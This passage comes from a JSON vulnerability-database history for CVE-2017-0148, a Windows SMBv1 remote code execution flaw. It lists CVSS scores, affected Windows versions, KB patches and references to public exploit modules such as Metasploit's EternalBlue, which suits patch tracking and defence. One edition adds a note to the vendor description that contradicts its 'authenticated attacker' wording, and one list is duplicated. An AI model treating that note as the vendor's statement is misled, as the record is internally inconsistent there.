"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", 
"KB4012214", "KB3205401", "KB4012606", "KB4012216", "KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server. (Note: the CVSS v2 vector recorded for this entry is Au:N and the CVSS v3 vector is PR:N, i.e. no authentication is required to reach the vulnerable SMBv1 request handling; treat the exposure as unauthenticated network access.)\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
